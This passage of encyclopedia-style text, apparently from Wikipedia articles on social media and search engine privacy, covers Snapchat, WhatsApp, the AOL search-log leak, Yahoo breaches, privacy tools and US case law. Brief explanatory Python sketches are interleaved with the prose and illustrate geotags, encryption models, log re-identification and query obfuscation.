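  "coordinates": {"type": "Point", "coordinates": [-73.9857, 40.7484]}
}
""")

if tweet.get("coordinates"):
    lon, lat = tweet["coordinates"]["coordinates"]  # GeoJSON order: lon, lat
    print(f"user was at latitude {lat}, longitude {lon}")
```

Nothing here requires special access: the coordinates ride along with the public tweet, which is why a "home at last" post can double as a street address.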
Teachers' privacy on MySpace has created controversy across the world. Teachers are forewarned by the Ohio News Association[153] that if they have a MySpace account, it should be deleted. eSchool News warns, "Teachers, watch what you post online."[154] The ONA also posted a memo advising teachers not to join these sites. Teachers can face consequences including license revocations, suspensions, and written reprimands. The Chronicle of Higher Education wrote an article on April 27, 2007, entitled "A MySpace Photo Costs a Student a Teaching Certificate" about Stacy Snyder.[155] She was a student of Millersville University of Pennsylvania who was denied her teaching degree because of an allegedly unprofessional photo posted on MySpace, which showed her drinking while wearing a pirate hat, with the caption "Drunken Pirate". As a substitute, she was given an English degree.

Sites such as Sgrouples and Diaspora have attempted to introduce various forms of privacy protection into their networks, while companies like Safe Shepherd have created software to remove personal information from the net.[156]

Certain social media sites such as Ask.fm, Whisper, and Yik Yak allow users to interact anonymously. The problem with websites such as these is that "despite safeguards that allow users to report abuse, people on the site believe they can say almost anything without fear or consequences—and they do." This is a privacy concern because users can say whatever they choose, and the receiver of a message may never know who they are communicating with. Sites such as these create a large opening for cyberbullying and cyberstalking. People seem to believe that since they can be anonymous, they have the freedom to say anything, no matter how mean or malicious.[157]

On July 6, 2010, Blizzard Entertainment announced that it would display the real names tied to user accounts in its game forums. On July 9, 2010, CEO and cofounder of Blizzard Mike Morhaime announced a reversal of the decision to force posters' real names to appear on Blizzard's forums. The reversal was made in response to subscriber feedback.[158]

Snapchat is a mobile application created by Stanford graduates Evan Spiegel and Bobby Murphy in September 2011.[159] Snapchat's main feature is that the application allows users to send a photo or video, referred to as a "snap", to recipients of choice, viewable for up to ten seconds before it disappears.[160] If the recipient of a snap tries to screenshot the photo or video sent, a notification is sent to the original sender saying it was screenshot and by whom. Snapchat also has a "stories" feature where users can send photos to their "story", and friends can view the story as many times as they want until it disappears after twenty-four hours. Users can make their Snapchat stories viewable to all of the friends on their friends list, only to specific friends, or publicly to anyone with a Snapchat account.[159] In addition to the stories feature, messages can be sent through Snapchat. Messages disappear after they are opened unless manually saved by the user, by holding down on the message until a "saved" notification pops up. No notification is sent to users that their message has been saved by the recipient; however, a notification is sent if the message is screenshot.[161]

In 2015, Snapchat updated its privacy policy, causing outrage among users because of changes in the company's ability to save user content.[162] These rules were put in place to support new features such as replaying a snap and "live" Snapchat stories, which require saving content to Snapchat servers in order to release it to other users at a later time.
The update stated that Snapchat has the right to reproduce, modify, and republish photos, as well as save those photos to Snapchat servers. Users felt uncomfortable with the idea that all photo content was saved and that the "disappearing photos" advertised by Snapchat did not actually disappear, and there was no way to control what content was saved and what was not. Snapchat responded to the backlash by saying it needed this license to access users' information in order to create new features, like the live Snapchat feature.[162]

With the 2015 update of Snapchat, users are able to contribute to "Live Stories", which are a "collection of crowdsourced snaps for a specific event or region."[163] By doing so, users allow Snapchat to share their location not just with their friends, but with everyone. According to Snapchat, once a user picks the option of sharing content through a Live Story, they grant the company an "unrestricted, worldwide, perpetual right and license to use your name, likeness, and voice in any and all media and distribution channels."[163]

In 2017, a feature called Snap Maps was incorporated into the app. Snap Maps allows users to track other users' locations, but when people "first use the feature, users can select whether they want to make their location visible to all of their friends, a select group of connections or to no one at all, which Snapchat refers to as 'ghost mode.'"[164]

This feature, however, has raised privacy concerns. "It is very easy to accidentally share everything that you've got with more people than you need to, and that's the scariest portion," cybersecurity expert Charles Tendell told ABC News of the Snapchat update.[165] To protect younger users of Snapchat, "Experts recommend that parents stay aware of updates to apps like Snapchat. They also suggest parents make sure they know who their kids' friends are on Snapchat and also talk to their children about who they add on Snapchat."[165]

An additional privacy concern users have with Snapchat is the deletion of snaps after 30 days. Many users become confused when it looks as if someone has gotten into their account and opened all of their snaps, which then increases their Snapscore; this has caused great concern about hackers getting into personal Snapchat accounts. To reassure users, Snapchat has added an explanation of the 30-day expiration to its Support webpage, yet it remains very unclear. What actually happens is this: after 30 days, any unopened snaps are automatically deleted, or expire (which appears to the user the same as being opened automatically). This changes the user's Snapscore, and after snaps expire, it looks as though all of them have been opened, shown by many unfilled or open boxes.

In 2016, Snapchat released a new product called "Snapchat Spectacles": sunglasses featuring a small camera that allows users to take photos and record up to 10 seconds of footage.[166] The cameras in the Spectacles are connected to users' existing Snapchat accounts, so users can easily upload their content to the application. This product has received negative feedback because the Spectacles do not stand out from normal sunglasses beyond the small cameras on the lenses. Therefore, users have the ability to record strangers without them knowing. Furthermore, the simplistic design may result in people using the glasses accidentally, mistaking them for regular glasses.
Critics of Snapchat Spectacles argue that the product is an invasion of privacy for people who do not know they are being recorded by individuals wearing the glasses. Many people believe that the Spectacles pose a risk in that a person's physical location might be disclosed to various parties, leaving the user vulnerable. Proponents disagree, saying that the glasses are distinguishable enough that users and people around them will notice them. Another argument in favor of the glasses is that people already expose themselves to similar scenarios by being in public.[166]

In October 2016, Amnesty International released a report ranking Snapchat along with ten other leading social media applications, including Facebook, iMessage, FaceTime, and Skype, on how well they protect users' privacy.[167] The report assessed Snapchat's use of encryption and found that it ranks poorly, as a result of not using end-to-end encryption; because of this, third parties have the ability to access snaps while they are being transferred from one device to another. The report also claimed that Snapchat does not explicitly inform users in its privacy policy of the application's level of encryption or of any threats the application may pose to users' rights, which further reduced its overall score.[167] Regardless of this report, Snapchat is currently considered the most trustworthy social media platform among users.[168]
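The distinction the Amnesty report draws can be sketched in a few lines. With transport-only encryption the provider holds the key and can read messages in transit or at rest; with end-to-end encryption only the two endpoints hold the key, and the provider merely relays ciphertext. The toy XOR cipher below is deliberately not real cryptography and says nothing about Snapchat's actual protocol; it only illustrates who can decrypt what under each model.

```python
# Toy illustration (NOT real cryptography): transport encryption vs
# end-to-end encryption, seen through who holds the key.

def toy_encrypt(key: bytes, msg: bytes) -> bytes:
    # repeating-key XOR; XOR is its own inverse, so this also decrypts
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(msg))

toy_decrypt = toy_encrypt

# Transport encryption: the client-to-server link is protected, but the
# server holds the key, so it can decrypt and inspect every message.
link_key = b"key-held-by-server"
ciphertext = toy_encrypt(link_key, b"my snap")
print(toy_decrypt(link_key, ciphertext))   # server reads: b'my snap'

# End-to-end: only sender and recipient share end_key; the server relays
# bytes it cannot decrypt.
end_key = b"shared-only-by-endpoints"
relayed = toy_encrypt(end_key, b"my snap")  # opaque to the server
print(toy_decrypt(end_key, relayed))        # recipient reads: b'my snap'
```

Under the first model, anyone who compromises or compels the provider can read the content; under the second, they obtain only ciphertext, which is the property the report found lacking.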
In 2014, allegations were made against Snapchat by the Federal Trade Commission (FTC) for deceiving users about its privacy and security measures. Snapchat's main appeal is its marketed ability to have users' photos disappear completely after the one-to-ten-second time frame, selected by the sender, is up. However, the FTC made a case claiming this was false, putting Snapchat in violation of regulations implemented to prevent deceptive consumer information. One focus of the case was that a "snap's" real lifespan is longer than most users perceive: the app's privacy policy stated that Snapchat itself temporarily stored all snaps sent, but it neglected to tell users that there was a period during which snaps had not yet been permanently deleted and could still be retrieved. As a result, many third-party applications were easily created that could save "snaps" sent by users and screenshot "snaps" without notifying the sender.[169] The FTC also claimed that Snapchat took information from its users, such as location and contact information, without their consent. Despite this not being written in its privacy policy, Snapchat transmitted location information from mobile devices to its analytics tracking service provider.[170] Although "Snapchat's privacy policy claimed that the app collected only your email, phone number, and Facebook ID to find friends for you to connect with, if you're an IOS user and entered your phone number to find friends, Snapchat collected the names and phone numbers of all the contacts in your mobile device address books without your notice or consent."[171] It was disclosed that the Gibsonsec security group had warned Snapchat of potential issues with its security; however, no action was taken to reinforce the system. In early 2014, 4.6 million matched usernames and phone numbers of users were publicly leaked, adding to the existing privacy controversy around the application.[172] Finally, the FTC claimed that Snapchat failed to secure its "find friends" feature by not requiring phone number verification in the registration process. Users could register accounts with numbers other than their own, giving them the ability to impersonate anyone they chose.[169] Snapchat had to release a public statement of apology to alert users of the misconduct and change its stated purpose to being a "fast and fun way to communicate with photos".[173]

WhatsApp, created in 2009, is a platform that allows users to communicate via text and voice message, video chat, and document sharing for free. WhatsApp was acquired by Facebook in 2014, but the brand continues to be promoted as a secure and reliable form of communication. The app can be downloaded and used on Android, iPhone, Mac or Windows PC, and Windows Phone devices without SMS fees or charges from a carrier. While asterisks across the WhatsApp website denote some hazards of fees and additional charges, it has become a popular application for consumers who communicate with people overseas.[174]

In 2019, WhatsApp introduced new privacy and security measures for its users, including Hide Muted Status and Frequently Forwarded. The hide muted status feature allows users to hide specific updates or interactions from specific users; however, if a user decides to "unhide" their status or updates from certain users, a list of all updates, including the previously hidden ones, will be shown to the previously blocked user. As in apps such as Snapchat and Instagram, users are notified when a story is forwarded, viewed, screenshotted, or shared. WhatsApp developers have added the Frequently Forwarded feature, which notifies users if a message, status, or update has been forwarded four or more times.[175]

Many social networking organizations have responded to the criticism and concerns over privacy brought up over time. It is claimed that changes to default settings, the storage of data, and sharing with third parties have all been updated and corrected in the light of criticism and/or legal challenges.[176] However, many critics remain unsatisfied, noting that fundamental changes to privacy settings in many social networking sites remain minor and at times inaccessible, and argue that social networking companies prefer to criticize users rather than adapt their policies.[177]

There are suggestions for individuals to obtain privacy by reducing or ending their own use of social media. This method does not succeed, since their information is still revealed by posts from their friends.[178]

There is ambiguity about how private IP addresses are. The Court of Justice of the European Union has ruled that they need to be treated as personally identifiable information if the business receiving them, or a third party like a service provider, knows the name or street address of the IP address holder, which would be true for static IP addresses but not for dynamic addresses.[179] California regulations say IP addresses need to be treated as personal information if the business itself, not a third party, can link them to a name and street address.[179][180] In 2020, an Alberta court ruled that police can obtain IP addresses, and the names and addresses associated with them, without a search warrant.
An investigation found the IP addresses from which online crimes had been initiated, and the service provider gave police the names and addresses associated with those IP addresses.[181]
https://en.wikipedia.org/wiki/Privacy_concerns_with_social_networking_services
Search engine privacy is a subset of internet privacy that deals with user data being collected by search engines. Both types of privacy fall under the umbrella of information privacy. Privacy concerns regarding search engines can take many forms, such as the ability of search engines to log individual search queries, browsing history, IP addresses, and cookies of users, and to conduct user profiling in general. The collection of personally identifiable information (PII) of users by search engines is referred to as tracking.[1]

This is controversial because search engines often claim to collect a user's data in order to better tailor results to that specific user and to provide the user with a better searching experience. However, search engines can also abuse and compromise their users' privacy by selling their data to advertisers for profit.[1] In the absence of regulations, users must decide what is more important to their search engine experience, the relevance and speed of results or their privacy, and choose a search engine accordingly.[2]

The legal framework in the United States for protecting user privacy is not very solid.[3] The most popular search engines collect personal information, but other search engines focused on privacy have cropped up recently. There have been several well-publicized breaches of search engine user privacy, involving companies like AOL and Yahoo. Individuals interested in preserving their privacy have options available to them, such as using software like Tor, which makes the user's location and personal information anonymous,[4] or using a privacy-focused search engine.

Search engines generally publish privacy policies to inform users about what data of theirs may be collected and what purposes it may be used for. While these policies may be an attempt at transparency by search engines, many people never read them[5] and are therefore unaware of how much of their private information, like passwords and saved files, is collected from cookies and may be logged and kept by the search engine.[6][7] This ties in with the phenomenon of notice and consent, which is how many privacy policies are structured. Notice and consent policies essentially consist of a site showing the user a privacy policy and having them click to agree. This is intended to let the user freely decide whether or not to go ahead and use the website.
This decision, however, may not actually be made so freely, because the costs of opting out can be very high.[8] Another big issue with putting the privacy policy in front of users and having them accept quickly is that such policies are often very hard to understand, even in the unlikely case that a user decides to read them.[7] Privacy-minded search engines, such as DuckDuckGo, state in their privacy policies that they collect much less data than search engines such as Google or Yahoo, and may not collect any.[9] As of 2008, search engines were not in the business of selling user data to third parties, though they do note in their privacy policies that they comply with government subpoenas.[8]

Google, founded in 1998, is the most widely used search engine, receiving billions of search queries every month.[8] Google logs all search terms in a database along with the date and time of the search, the browser and operating system, the IP address of the user, the Google cookie, and the URL that shows the search engine and search query.[10] The privacy policy of Google states that it passes user data on to various affiliates, subsidiaries, and "trusted" business partners.[8]
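Of the items in such a log entry, the URL alone is enough to reconstruct what was searched, since major engines carry the query in the URL's query string (Google uses the q parameter). A minimal sketch using only Python's standard library; the logged URL is invented for illustration:

```python
# Minimal sketch: one logged search URL reveals both the engine used and
# the user's full query. The URL below is invented.
from urllib.parse import urlparse, parse_qs

logged_url = "https://www.google.com/search?q=divorce+lawyers+near+me&hl=en"

parts = urlparse(logged_url)
query = parse_qs(parts.query).get("q", [""])[0]  # 'q' carries the search terms

print(parts.hostname)  # www.google.com -> which search engine was used
print(query)           # 'divorce lawyers near me' -> what was searched
```

This is why retained server logs are sensitive even without any account information attached: the query text itself is the private data.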
Yahoo, founded in 1994, also collects user data. It is a well-known fact that users do not read privacy policies, even for services that they use daily, such as Yahoo! Mail and Gmail.[5] This persistent failure of consumers to read privacy policies can be disadvantageous to them, because while they may not pick up on differences in the language of privacy policies, judges in court cases certainly do.[5] This means that search engine and email companies like Google and Yahoo are technically able to keep up the practice of targeting advertisements based on email content, since they declare that they do so in their privacy policies.[5] A study was done to see how much consumers cared about the privacy policies of Google, specifically Gmail, and their detail, and it determined that users often thought Google's practices were somewhat intrusive, but that users would not often be willing to counteract this by paying a premium for their privacy.[5]

DuckDuckGo, founded in 2008, claims to be privacy focused.[11][12] DuckDuckGo does not collect or share any personal information of users, such as IP addresses or cookies,[11] which other search engines usually log and keep for some time. It also does not have spam, and it protects user privacy further by anonymizing search queries from the website the user chooses and by using encryption.[11] Similarly privacy-oriented search engines include Startpage, Ecosia, Qwant, MetaGer, and Disconnect.[12] Mojeek and Brave Search are privacy-focused search engines that build their own indexes.

Most search engines can, and do, collect personal information about their users[1] according to their own privacy policies. This user data could be anything from location information to cookies, IP addresses, search query histories, click-through history, and online fingerprints.[2][6][13][14] This data is often stored in large databases, and users may be assigned numbers in an attempt to provide them with anonymity. Data can be stored for an extended period of time. For example, the data collected by Google on its users is retained for up to 9 months,[15][16] though some studies state that this number is actually 18 months.[17] This data is used for various reasons, such as optimizing and personalizing search results for users, targeting advertising,[8] and trying to protect users from scams and phishing attacks.[2] Such data can be collected even when a user is not logged in to their account, or when using a different IP address, by using cookies.[8]

What search engines often do once they have collected information about a user's habits is create a profile of the user, which helps the search engine decide which links to show for different search queries submitted by that user, or which ads to target them with.[13] An interesting development in this field is automated learning, also known as machine learning. Using this, search engines can refine their profiling models to more accurately predict what any given user may want to click on, by A/B testing results offered to users and measuring users' reactions.[18]

Companies like Google, Netflix, YouTube, and Amazon have all started personalizing results more and more. One notable example is how Google Scholar takes into account the publication history of a user in order to produce results it deems relevant.[1] Personalization also occurs when Amazon recommends books or when IMDb suggests movies, using previously collected information about a user to predict their tastes.[18] For personalization to occur, a user need not even be logged into their account.[4]

The internet advertising company DoubleClick, which helps advertisers target users for specific ads, was bought by Google in 2008 and was a subsidiary until June 2018, when Google rebranded and merged DoubleClick into its Google Marketing Platform. DoubleClick worked by depositing cookies on users' computers that would track the sites they visited that carried DoubleClick ads.[10] When Google was in the process of acquiring DoubleClick, there was a privacy concern that the acquisition would let Google create even more comprehensive profiles of its users, since it would be collecting data about search queries and additionally tracking websites visited.[10] This could lead to users being shown ads that are increasingly effective with the use of behavioral targeting.[17] With more effective ads comes the possibility of more purchases by consumers that they might not have made otherwise.

In 1994, a conflict between selling ads and the relevance of results on search engines began. This was sparked by the development of the cost-per-click model, which challenged the methods of the already-established cost-per-mille model. The cost-per-click method was directly related to what users searched, whereas the cost-per-mille method was directly influenced by how much a company could pay for an ad, no matter how many times people interacted with it.[16][clarification needed]

Besides ad targeting and personalization, Google also uses data collected on users to improve the quality of searches.
Search result click histories and query logs are crucial in helping search engines optimize search results for individual users.[2] Search logs also help search engines in the development of the algorithms they use to return results, such as Google's well-known PageRank.[2] An example of this is how Google uses databases of information to refine Google Spell Checker.[8]

Many believe that user profiling is a severe invasion of user privacy, and there are organizations such as the Electronic Privacy Information Center (EPIC) and Privacy International that are focused on advocating for user privacy rights.[2][8] In fact, EPIC filed a complaint with the Federal Trade Commission in 2007 claiming that Google should not be able to acquire DoubleClick, on the grounds that doing so would compromise user privacy.[8] The Open Search Foundation specifically targets search engine privacy by investigating ways of making search a public, collaborative good where people can search freely without their personal data being collected and evaluated.

Experiments have been done to examine consumer behavior when shoppers are given information on the privacy of retailers through privacy ratings integrated into search engines.[19] Researchers had the treatment group use a search engine called Privacy Finder, which scans websites and automatically generates an icon showing how the level of privacy a site will give the consumer compares with the privacy preferences that consumer has specified. The result of the experiment was that subjects in the treatment group, those using the search engine that indicated the privacy levels of websites, purchased products from websites that gave them higher levels of privacy, whereas the participants in the control groups opted for the products that were simply the cheapest.[19] The study participants were also given a financial incentive, because they could keep any leftover money from purchases. Since participants had to use their own credit cards, the study suggests that they had a significant aversion to purchasing products from sites that did not offer the level of privacy they wanted, indicating that consumers value their privacy monetarily.

Many individuals and scholars have recognized the ethical concerns regarding search engine privacy. The collection of user data by search engines can be viewed as a positive practice because it allows the search engine to personalize results.[2] This implies that users would receive more relevant results, and be shown more relevant advertisements, when their data, such as past search queries, location information, and clicks, is used to create a profile for them. Also, search engines are generally free of charge for users and can remain afloat because one of their main sources of revenue is advertising,[2] which can be more effective when targeted.

This collection of user data can also be seen as an overreach by private companies for their own financial gain, or as an intrusive surveillance tactic. Search engines can make money using targeted advertising because advertisers are willing to pay a premium to present their ads to the most receptive consumers. Also, when a search engine collects and catalogs large amounts of data about its users, there is the potential for it to be leaked accidentally or breached.
The government can also subpoena user data from search engines when they have databases of it.[3] Search query database information may also be subpoenaed by private litigants for use in civil cases, such as divorces or employment disputes.[8]

One major controversy regarding search engine privacy was the AOL search data leak of 2006. For academic and research purposes, AOL made public a list of about 20 million search queries made by about 650,000 unique users.[17] Although AOL assigned unique identification numbers to the users instead of attaching names to each query, it was still possible to ascertain the true identities of many users simply by analyzing what they had searched, including locations near them and the names of friends and family members.[13][17] A notable example of this was how the New York Times identified Thelma Arnold through "reverse searching".[8][17] Users also sometimes do "ego searches", where they search for themselves to see what information about them is on the internet, making it even easier to identify supposedly anonymous users.[8] Many of the search queries released by AOL were incriminating or seemingly extremely private, such as "how to kill your wife" and "can you adopt after a suicide attempt".[8] This data has since been used in several experiments that attempt to measure the effectiveness of user privacy solutions.[1][20]
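A minimal sketch of why replacing names with ID numbers fails to anonymize a query log: grouping the log by ID reassembles each user's entire search history, and quasi-identifiers inside the queries (places, neighborhoods, names) can then point back to one person. This is essentially how the New York Times found Thelma Arnold, AOL user 4417749. The log entries below are invented, loosely echoing details reported about that case.

```python
# Pseudonymous IDs do not anonymize search logs: grouping by ID rebuilds
# each user's history, and the queries themselves carry identifying detail.
# All entries here are invented for illustration.
from collections import defaultdict

query_log = [
    (4417749, "landscapers in lilburn ga"),
    (4417749, "homes sold in shadow lake subdivision gwinnett county"),
    (4417749, "dog that urinates on everything"),
    (991234,  "cheap flights to boston"),
]

profiles = defaultdict(list)
for user_id, query in query_log:
    profiles[user_id].append(query)

# Taken together, 4417749's queries narrow the search to a few households
# in one Georgia subdivision -- no name required.
for user_id, queries in sorted(profiles.items()):
    print(user_id, queries)
```

The privacy failure is in the joinability of the records, not in any single query, which is why simple pseudonymization is widely considered insufficient for releasing search data.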
Both Google and Yahoo were subjects of a Chinese hack in 2010.[21] While Google responded to the situation seriously by hiring new cybersecurity engineers and investing heavily in securing user data, Yahoo took a much more lax approach.[21] Google started paying hackers to find vulnerabilities in 2010, while it took Yahoo until 2013 to follow suit.[21] Yahoo was also identified in the Snowden data leaks as a common hacking target for spies of various nations, and Yahoo still did not give its newly hired chief information security officer the resources to really effect change within the company.[21] In 2012, Yahoo hired Marissa Mayer, previously a Google employee, as its new CEO, but she chose not to invest much in Yahoo's security infrastructure, going as far as refusing to implement a basic and standard security measure: forcing the reset of all passwords after a breach.[21]

Yahoo is known for being the subject of multiple breaches and hacks that have compromised large amounts of user data. As of late 2016, Yahoo had announced that at least 1.5 billion user accounts had been breached during 2013 and 2014.[21] The breach of 2013 compromised over a billion accounts, while the breach of 2014 included about 500 million accounts.[21] The data compromised in the breaches included personally identifiable information such as phone numbers, email addresses, and birth dates, as well as information like security questions (used to reset passwords) and encrypted passwords.[21] Yahoo made a statement saying that the breaches were the work of state-sponsored actors, and in 2017, two Russian intelligence officers were indicted by the United States Department of Justice as part of a conspiracy to hack Yahoo and steal user data.[21] As of 2016, the Yahoo breaches of 2013 and 2014 were the largest of all time.[21]

In October 2018, there was a Google+ data breach that potentially affected about 500,000 accounts and led to the shutdown of the Google+ platform.[22]

The government may want to subpoena user data from search engines for any number of reasons, which is why this is a big threat to user privacy.[2] In 2006, the government wanted such data as part of its defense of COPA, and only Google refused to comply.[8] While protecting the online privacy of children may be an honorable goal, there are concerns about whether the government should have access to such personal data to achieve it. At other times, it may want the data for national security purposes; access to big databases of search queries in order to prevent terrorist attacks is a common example.[3][14]

Whatever the reason, it is clear that the fact that search engines create and maintain these databases of user data is what makes it possible for the government to access them.[2] Another concern regarding government access to search engine user data is "function creep", a term that here refers to how data originally collected by the government for national security purposes may eventually be used for other purposes, such as debt collection.[8] To many, this would indicate government overreach. While protections for search engine user privacy have begun developing recently, the government has increasingly been on the side that wants to ensure search engines retain data, making users less protected and their data more available for anyone to subpoena.[8]

A different, although popular, route for a privacy-centered user to take is simply to start using a privacy-oriented search engine, such as DuckDuckGo. This search engine maintains the privacy of its users by not collecting data on or tracking its users.[11] While this may sound simple, users must take into account the trade-off between privacy and relevant results when deciding to switch search engines. Results for search queries can be very different when the search engine has no search history to aid it in personalization.

Mozilla is known for its beliefs in protecting user privacy on Firefox. Mozilla Firefox users can delete the tracking cookie that Google places on their computer, making it much harder for Google to group data.[2] Firefox also has a button called "Clear Private Data",[2] which gives users more control over their settings. Internet Explorer users have this option as well. When using a browser like Google Chrome or Safari, users also have the option to browse in "incognito" or "private browsing" modes, respectively.
When in these modes, the user's browsing history and cookies are not collected.[2]

The Google, Yahoo!, AOL, and MSN search engines all allow users to opt out of the behavioral targeting they use.[2] Users can also delete their search and browsing history at any time. The Ask.com search engine also has AskEraser, which, when used, purges user data from Ask's servers.[2] Deleting a user's profile and history from search engine logs also helps protect user privacy in the event that a government agency wants to subpoena it: if there are no records, there is nothing the government can access. It is important to note that simply deleting one's browsing history does not delete all the information the search engine holds; some companies do not delete the data associated with an account when the browsing history is cleared, and even companies that do delete user data usually do not delete all of it, keeping records of how the search engine was used.[23]

An innovative solution, proposed by researchers Viejo and Castellà-Roca, is a social network solution whereby user profiles are distorted.[15] In their plan, each user would belong to a group, or network, of people who all use the search engine. Every time somebody wanted to submit a search query, it would be passed on to another member of the group to submit on their behalf until someone submitted it. This would ideally lead to all search queries being divided up equally among all members of the network. This way, the search engine cannot build a useful profile of any individual user in the group, since it has no way to discern which query actually belonged to which user.
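A minimal sketch of that group-based idea follows, with hypothetical member names and a stand-in submit function; in the actual proposal, query routing and result delivery are handled cryptographically rather than by a trusted script.

```python
# Minimal sketch of the group-based profile-distortion idea attributed to
# Viejo and Castellà-Roca: each query is submitted by a randomly chosen
# group member, scrambling the engine's per-user profiles.
# Member names and submit_to_search_engine are hypothetical stand-ins.
import random

GROUP = ["alice", "bob", "carol", "dave"]

def submit_to_search_engine(member, query):
    # The engine attributes the query to `member`, not to its originator.
    print(f"{member} submits: {query}")

def search(real_user, query):
    proxy = random.choice(GROUP)       # may or may not be the real user
    submit_to_search_engine(proxy, query)
    # In the real scheme, results are relayed back to real_user privately.

search("alice", "symptoms of a rare disease")  # engine may log it under "dave"
```

Over many queries, each profile the engine builds becomes a roughly even mixture of the whole group's interests, which is what makes the profiles useless for targeting any one member.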
After the Google Spain v. AEPD case, it was established that people had the right to request that search engines delete personal information from their search results, in compliance with other European data protection regulations. This process of simply removing certain search results is called de-listing.[24] While effective in protecting the privacy of those who wish information about them not to be accessible through a search engine, it does not necessarily protect the contextual integrity of search results.[24] For data that is not highly sensitive or compromising, reordering search results is another option, whereby people would be able to rank how relevant certain data is at any given point in time, which would then alter the results shown when someone searches for their name.[24]

A sort of DIY option for privacy-minded users is to use software like Tor, an anonymity network. Tor functions by encrypting user data and routing queries through thousands of relays. While this process is effective at masking IP addresses, it can slow the speed of results.[2] And while Tor may work to mask IP addresses, studies have shown that simulated attacker software could still match search queries to users even when anonymized using Tor.[25][26]

Unlinkability and indistinguishability are also well-known solutions to search engine privacy, although they have proven somewhat ineffective in actually providing users with anonymity with respect to their search queries.[25] Both unlinkability and indistinguishability solutions try to dissociate search queries from the user who made them, making it impossible for the search engine to definitively link a specific query with a specific user and create a useful profile on them. This can be done in a couple of different ways.

One way is an unlinkability solution, in which the user hides information such as their IP address from the search engine. This is perhaps the simplest and easiest approach, because any user can do it by using a VPN, although it still does not guarantee total privacy from the search engine.[25]

Another way is an indistinguishability solution, in which the user runs a plugin or software that generates multiple different search queries for every real search query they make.[25] It functions by obscuring the real searches a user makes, so that a search engine cannot tell which queries are the software's and which are the user's.[25] Then, it is more difficult for the search engine to use the data it collects on a user to do things like target ads.
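A minimal sketch of such an indistinguishability plugin follows, with an invented decoy pool and a stand-in send function; production tools would draw decoys from realistic query distributions so that they cannot be filtered out statistically.

```python
# Minimal sketch of an indistinguishability plugin: for every real query,
# fire several decoys so the engine cannot tell which one the user meant.
# DECOY_POOL and send_query are hypothetical stand-ins.
import random

DECOY_POOL = ["weather tomorrow", "pasta recipes",
              "used car prices", "exchange rates"]

def send_query(query):
    # Stand-in for submitting a query to the search engine.
    print("sent to engine:", query)

def obfuscated_search(real_query, n_decoys=3):
    batch = random.sample(DECOY_POOL, n_decoys) + [real_query]
    random.shuffle(batch)   # hide which query in the batch is real
    for q in batch:
        send_query(q)       # the engine logs decoys and the real query alike

obfuscated_search("symptoms of a rare disease")
```

The engine's profile of the user then mixes one real signal with several fabricated ones, diluting its value for profiling and ad targeting.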
Because the internet and search engines are relatively recent creations, no solid legal framework for privacy protections with respect to search engines has been put in place. However, scholars do write about the implications of existing privacy law to inform what right to privacy search engine users have. As this is a developing field of law, there have been several lawsuits concerning the privacy search engines are expected to afford their users. The Fourth Amendment is well known for the protections it offers citizens from unreasonable searches and seizures, but in Katz v. United States (1967), these protections were extended to cover intrusions on the privacy of individuals, in addition to intrusions on property and persons.[3] Privacy of individuals is a broad term, but it is not hard to imagine that it includes the online privacy of an individual. The Confrontation Clause of the Sixth Amendment is applicable to the protection of big data from government surveillance.[14] The Confrontation Clause essentially states that defendants in criminal cases have the right to confront witnesses who provide testimonial statements.[14] If a search engine company like Google gives information to the government to prosecute a case, these witnesses are the Google employees involved in the process of selecting which data to hand over. The specific employees who must be available to be confronted under the Confrontation Clause are the producer who decides what data is relevant and provides the government with what it has asked for, the Google analyst who certifies the proper collection and transmission of data, and the custodian who keeps records.[14] The data these employees of Google curate for trial use is then treated as testimonial statement.[14] The overall effect of the Confrontation Clause on search engine privacy is that it places a check on how the government can use big data and provides defendants with protection from human error.[14] The 1967 Katz case is prominent because it established a new interpretation of privacy under the Fourth Amendment, specifically that people had a reasonable expectation of it.[3] Katz v. United States concerned whether or not it was constitutional for the government to electronically listen to and record a conversation Katz had from a public phone booth. The court ruled that it did violate the Fourth Amendment, because the actions of the government were considered a "search", and that the government needed a warrant.[3] When thinking about search engine data collected about users, the way telephone communications were classified under Katz v. United States could be a precedent for how it should be handled. In Katz v. United States, public telephones were deemed to have a "vital role" in private communications.[3] This case took place in 1967, but nowadays the internet and search engines surely have this vital role in private communications, and people's search queries and IP addresses can be thought of as analogous to the private phone calls placed from public booths.[3] The 1976 Supreme Court case United States v. Miller is relevant to search engine privacy because the court ruled that when third parties gathered or had information given to them, the Fourth Amendment was not applicable. Jayni Foley argues that the ruling of United States v. Miller implies that people cannot have an expectation of privacy when they provide information to third parties.[3] When thinking about search engine privacy, this is important because people willingly provide search engines with information in the form of their search queries and various other data points that they may not realize are being collected. In the 1979 Supreme Court case Smith v. Maryland, the Supreme Court built on the precedent about assumption of risk set in the 1976 United States v. Miller case. The court ruled that the Fourth Amendment did not prevent the government from monitoring who dialed which phone numbers by using a pen register, because doing so did not qualify as a "search".[3] Both the United States v. Miller and Smith v. Maryland cases have been used to deny users the Fourth Amendment privacy protections for the records that internet service providers (ISPs) keep.[3] This is also articulated in the Sixth Circuit Guest v. Leis case as well as the United States v. Kennedy case, where the courts ruled that Fourth Amendment protections did not apply to ISP customer data, since customers willingly provided ISPs with their information just by using their services.[3] Similarly, the current legal structure regarding privacy and assumption of risk can be interpreted to mean that users of search engines cannot expect privacy in regard to the data they communicate by using search engines.[3] The Electronic Communications Privacy Act (ECPA) of 1986 was passed by Congress in an effort to start creating a legal structure for privacy protections in the face of new forms of technology, although it was by no means comprehensive, because there are considerations for current technologies that Congress never imagined in 1986 and could not account for.[3] The ECPA does little to regulate ISPs and mainly prevents government agencies from gathering information stored by ISPs without a warrant. What the ECPA does not do, unsurprisingly because it was enacted before internet usage became a common occurrence, is say anything about search engine privacy and the protections users are afforded in terms of their search queries.[3] The background of the 2006 Gonzales v. Google case is that the government was trying to bolster its defense of the Child Online Protection Act (COPA).[8] It was conducting a study to see how effective its filtering software was with regard to child pornography.[8] To do this, the government subpoenaed search data from Google, AOL, Yahoo!, and Microsoft to use in its analysis and to show that people search for information that is potentially compromising to children.[3][8] The search data the government wanted included both the URLs that appeared to users and the actual search queries of users. Of the search engines subpoenaed to produce search queries and URLs, only Google refused to comply with the government,[2] even after the request was reduced in size.
